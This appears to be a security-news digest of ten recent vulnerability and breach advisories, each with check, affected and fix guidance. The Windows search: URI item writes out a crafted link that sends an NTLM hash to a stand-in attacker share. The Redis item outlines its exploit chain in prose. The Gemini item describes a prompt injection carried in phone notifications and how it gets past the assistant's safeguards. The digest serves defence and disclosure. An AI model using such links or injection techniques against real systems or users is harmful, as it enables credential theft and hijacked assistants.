Last updated: July 6, 2026 at 12:53 AM UTC
All 559 Vulnerability 199 Breach 107 Threat 246 Defense 7

VS Code zero-day lets one click steal full-scope GitHub OAuth token via github.dev webview - PoC public, no patch yet

Security researcher Ammar Askar has released exploit code for an unpatched VS Code zero-day that lets attackers steal GitHub OAuth tokens with a single click. The flaw abuses VS Code's sandboxed webview message-passing system: malicious JavaScript in a webview simulates keypresses in the main editor to install a malicious extension that captures the GitHub OAuth token github.com POSTs to github.dev. The token is not scoped to a single repo - it grants full access to every private repository the victim can reach. No CVE has been assigned and there is no patch. Users can mitigate by clearing github.dev cookies and on-device site data, which restores the sign-in prompt.

Check
Inventory developer machines using VS Code and github.dev. Warn developers not to click untrusted links that open github.dev. Audit installed VS Code extensions for unfamiliar additions.
Affected
VS Code users who authenticate to github.dev. The leaked GitHub OAuth token is unscoped, granting full access to every private repository the victim can reach. No patch or CVE yet.
Fix
Until patched: clear github.dev cookies and on-device site data so the sign-in prompt reappears. Treat unsolicited github.dev links as hostile. Rotate GitHub tokens if exposure is suspected.

HTTP/2 Bomb: single 100Mbps client crashes NGINX, Apache, IIS, Envoy, Cloudflare Pingora in seconds - found by OpenAI Codex agent

Offensive-security firm Calif, with discovery work performed by OpenAI's Codex software agent, has disclosed HTTP/2 Bomb, a denial-of-service attack that crashes web servers from a single machine in seconds. It works against default HTTP/2 configurations of NGINX, Apache, Microsoft IIS, Envoy, and Cloudflare Pingora. The technique combines HPACK header-compression amplification (one attacker byte triggering thousands of bytes of server allocation, up to 5,700:1 on Envoy) with Slowloris-style flow-control stalling via zero-byte windows that prevents the memory from ever being freed. A home computer on a 100 Mbps link can force Apache or Envoy to hold 32 GB of RAM in roughly 20 seconds, bypassing existing header-size defenses.

Check
Inventory internet-facing web servers and proxies running HTTP/2 (NGINX, Apache, IIS, Envoy, Cloudflare Pingora). Monitor for sudden per-connection memory spikes and stalled HTTP/2 streams with zero-window flow control.
Affected
Default HTTP/2 configurations of NGINX, Apache, IIS, Envoy, and Cloudflare Pingora. A single 100 Mbps client can hold 32 GB of server RAM in ~20 seconds, bypassing header-size limits.
Fix
Apply vendor HTTP/2 patches and mitigations as released. Cap per-connection memory and concurrent streams, enforce flow-control timeouts, and rate-limit HTTP/2 connections. Consider disabling HTTP/2 on exposed servers until patched.

Microsoft 365 Android apps leak FOCI SSO tokens to any local app via leftover setIsDebugMode(true) - four CVEs, six apps

Enclave researchers have disclosed FlagLeft, a flaw in Microsoft 365 Android apps that let any local app steal account tokens because a shared Microsoft SDK shipped with setIsDebugMode(true) left in production code, skipping the check that should reject untrusted apps requesting SSO handoff. The leaked FOCI single-sign-on tokens can be refreshed and reused over long periods, with traffic that looks routine in logs. It affected Word, PowerPoint, Excel, Microsoft 365 Copilot, Loop, and OneNote (billions of downloads); Teams shipped the flag false and was unaffected. Microsoft issued four CVEs on May 12 (CVE-2026-41100/41101/41102/42832). The patched Android Word build is 16.0.19822.20190; a malicious on-device app is all it takes.

Check
Push Microsoft 365 Android app updates via MDM. Confirm Word is on build 16.0.19822.20190 or later and other apps updated through Google Play. Audit Android fleets for sideloaded apps.
Affected
Microsoft 365 Android apps (Word, PowerPoint, Excel, Copilot, Loop, OneNote) below the patched builds. A malicious on-device app can steal refreshable FOCI SSO tokens; Teams was unaffected.
Fix
Update all M365 Android apps from Google Play. Note the patch does not revoke already-stolen tokens - revoke active sessions for potentially-affected users and enforce app-install controls on managed devices.

Autonomous AI tool finds 2-year-old Redis use-after-free RCE CVE-2026-23479 - most cloud Redis runs passwordless, exploit public

Team Xint Code has disclosed CVE-2026-23479, a use-after-free remote code execution flaw in Redis that sat unnoticed in every stable branch from 7.2.0 until the May 5 fixes - over two years. The bug lives in unblockClientOnKey(), which keeps using a client pointer after processCommandAndResetClient() can free it. Exploitation needs an authenticated session, but Wiz's analysis finds Redis in most cloud environments with the majority running passwordless, where the default user already holds every privilege the exploit chain requires. The published exploit leaks a heap pointer via Lua, reclaims a freed client with a fake structure, and overwrites a GOT entry to repoint strcasecmp() at system(). NVD rates it 8.8.

Check
Inventory Redis instances and confirm version is past the May 5 fix. Identify passwordless or internet-reachable deployments. Audit for unexpected Lua EVAL activity and child processes spawned by redis-server.
Affected
Redis 7.2.0 through the May 5 fixes (over two years of stable branches). Exploitation needs an authenticated session, but most cloud Redis runs passwordless with the all-privileged default user.
Fix
Upgrade Redis to the patched release. Require authentication and strong ACLs, bind to localhost or private networks, never expose Redis to the internet. Enable full RELRO when building images.

Acer Wave 7 mesh routers: max-severity zero-days CVE-2026-49200/49201 expose plaintext credentials and hardcoded AES backdoor key, patch end of June

Acer is working to patch two maximum-severity zero-days in its Wave 7 mesh routers running firmware T7c_GBL_1.01.000055 or earlier, reported by researcher Gergo Pap. CVE-2026-49200 is a broken-access-control flaw: the acer_cgi.log file is reachable without authentication via the web interface and contains cleartext web and Telnet login credentials, leading to unauthorized system access. CVE-2026-49201 stems from a hardcoded AES key in the upload.cgi backup-processing binary, letting unauthenticated remote attackers decrypt, modify, and re-encrypt system backups to inject a persistent backdoor. No patches are available yet; Acer targets fixes by the end of June 2026 and urges users to update immediately once released.

Check
Inventory Acer Wave 7 mesh routers and confirm firmware version. Restrict web-interface and Telnet access to trusted networks. Watch for Acer's end-of-June firmware and apply immediately on release.
Affected
Acer Wave 7 routers on firmware T7c_GBL_1.01.000055 or earlier. CVE-2026-49200 exposes cleartext credentials in an unauthenticated log file; CVE-2026-49201's hardcoded AES key enables backdoored backups.
Fix
No patch yet (targeted end of June 2026). Disable remote/WAN management, restrict admin access to wired LAN, and rotate router and Telnet credentials. Apply Acer firmware the moment it ships.

Unpatched Windows search: URI handler leaks NTLMv2 hashes via crafted crumb=location UNC path - same class as patched Snipping Tool flaw

Huntress has disclosed an unpatched Windows vulnerability in the search: URI handler that can leak a user's NTLMv2 hash to an attacker. It mirrors CVE-2026-33829 - the Snipping Tool ms-screensketch: handler flaw Microsoft patched in April - achieving the same end via search:query and crumb=location: parameters pointing at an attacker UNC path (for example, search:query=test&crumb=location:\\attacker\share). If the user approves launching the crafted link from a web page or email, Windows connects to the attacker's SMB server and discloses the Net-NTLMv2 hash, which can be relayed or cracked to authenticate as the user. No patch is currently available; defenders should block outbound SMB and apply Huntress mitigations.

Check
Hunt for processes launching search: URIs with crumb=location pointing at UNC paths. Monitor outbound SMB (TCP 445) to external hosts. Educate users against approving search: link prompts.
Affected
Windows systems with the unpatched search: URI handler. A crafted link in a web page or email, once approved, forces an SMB connection that discloses the user's Net-NTLMv2 hash.
Fix
Block outbound SMB (TCP 445 and 139) at the perimeter. Enforce SMB signing and NTLM relay protections. Apply Huntress mitigations and disable the search: handler where feasible pending a patch.

SafeBreach 'Fake Context Alignment' hijacks Google Gemini on Android via malicious WhatsApp/Slack notifications - no malicious app needed, now patched

SafeBreach's Or Yair has demonstrated Fake Context Alignment, a technique that hijacks Google Gemini's voice assistant on Android through malicious notifications from apps like WhatsApp and Slack - no malicious app on the phone required. Gemini's Utilities feature reads and acts on notification text as if it were instructions, an attack surface Yair calls 'effectively infinite.' The bypass runs two illusions at once: it poses the real authorization question in a language the victim does not speak, defeating Google's post-Invitation prompt-injection mitigations. It can fake a boss's message, open windows, force a Zoom call, or poison long-term memory. Google has patched it; no CVE was assigned.

Check
Advise Android users with Gemini to disable or restrict its Utilities notification-reading feature where not essential. Treat unexpected spoken instructions referencing Drive uploads or calls with suspicion.
Affected
Android users with Google Gemini's notification-reading Utilities enabled. Any app or service that can push a notification could inject instructions; iOS and web are not affected. Now patched.
Fix
Ensure Gemini is updated to the patched version. Limit which apps can post notifications Gemini reads. For sensitive actions, require on-screen confirmation rather than voice-only approval.

Chinese cybercrime actor TA4922 expands to Europe with Atlas RAT and localized payroll/tax lures - likely LLM-accelerated malware

Proofpoint has detailed TA4922, a Chinese-speaking financially-motivated cybercrime group that has expanded from East Asia into Europe, deploying the previously undocumented Atlas backdoor against organizations in Germany, Italy, the UK, and South Africa. Since March its tempo has surged - Proofpoint says TA4922 now runs more unique campaigns than any other cybercrime actor in its data. Lures impersonate payroll notices, tax audits, VAT filings, compliance notices, invoices, and HR communications, with follow-up contact via WhatsApp, LINE, and Microsoft Teams. The group overlaps with activity reported as Silver Fox and Void Arachne. Proofpoint believes the rapidly expanding malware arsenal is being accelerated with LLMs, citing AI-generated code patterns and placeholder values.

Check
Hunt European endpoints for the Atlas backdoor and TA4922 custom loaders. Inspect email for payroll/tax/VAT/invoice lures and unsolicited WhatsApp, LINE, or Teams contact. Apply Proofpoint IoCs.
Affected
Organizations in Germany, Italy, the UK, and South Africa - TA4922's expanded European targets. Finance, HR, and tax-themed lures plus messaging-app outreach are the delivery vectors.
Fix
Apply Proofpoint IoCs and block Atlas RAT C2. Train finance and HR staff against tax/payroll/invoice lures and unsolicited messaging-app contact. Restrict execution of email-delivered loaders and scripts.

CISA, FBI, NSA warn hackers are modifying internet-exposed fuel tank gauge (ATG) systems - prior activity linked to Iran

CISA, the FBI, the NSA, the Department of Energy, and partners have warned that threat actors are targeting internet-exposed automatic tank gauge (ATG) systems used to monitor fuel and liquid storage across the Energy, Chemical, Food and Agriculture, and Transportation sectors. Attackers gain access via authentication-bypass flaws, hardcoded credentials, OS command-execution bugs, SQL injection, and privilege escalation, then modify network settings, product identifiers, tank volumes, and pump controls, and can disable alerts - raising the risk of leaks or equipment failure. The advisory does not formally attribute the activity, but it follows May CNN reporting linking Iranian hackers to similar ATG breaches. Agencies urge removing ATG systems from the internet.

Check
Inventory automatic tank gauge (ATG) systems and confirm none are internet-exposed. Replace default passwords, enable MFA, and review device logs for unauthorized changes to settings, volumes, or pump controls.
Affected
Internet-exposed ATG systems across Energy, Chemical, Food and Agriculture, and Transportation sectors. Access via auth-bypass, hardcoded credentials, command-execution, SQL injection, and privilege-escalation flaws. Prior activity linked to Iran.
Fix
Remove ATG systems from the internet; restrict remote access via firewalls, VPNs, or ACLs. Replace default credentials, enforce MFA, apply updates, and monitor for unauthorized configuration changes.

Dental-benefits provider DentaQuest added to Have I Been Pwned with 2,553,599 breached accounts; healthcare-themed phishing risk

Have I Been Pwned has added US dental-benefits provider DentaQuest to its breach corpus with 2,553,599 unique email addresses. DentaQuest is one of the largest dental and vision benefits administrators in the United States, serving Medicaid, Medicare, and commercial members. As is typical for HIBP additions, the underlying breach source and disclosure details are not published alongside the entry, but the listing lets individuals and organizations check whether their accounts appear in the leaked dataset. Healthcare and insurance data carries elevated risk: affected members should anticipate benefits-themed phishing, claim-status lures, and identity-theft attempts, and should rotate any reused passwords. It is among the larger US healthcare-adjacent breaches surfacing recently.

Check
Check whether your @company emails appear in HIBP's DentaQuest corpus. Warn affected staff about dental/medical-benefits-themed phishing - claim status, coverage updates, refund lures - over the next 60-90 days.
Affected
2,553,599 unique email addresses tied to DentaQuest dental and vision benefits members (Medicaid, Medicare, commercial). Healthcare data elevates identity-theft and benefits-phishing risk.
Fix
Affected individuals: rotate DentaQuest passwords and any reused elsewhere, enable MFA, monitor benefits statements. Organizations: add DentaQuest to breach-monitoring watchlists and brief staff on healthcare-themed social engineering.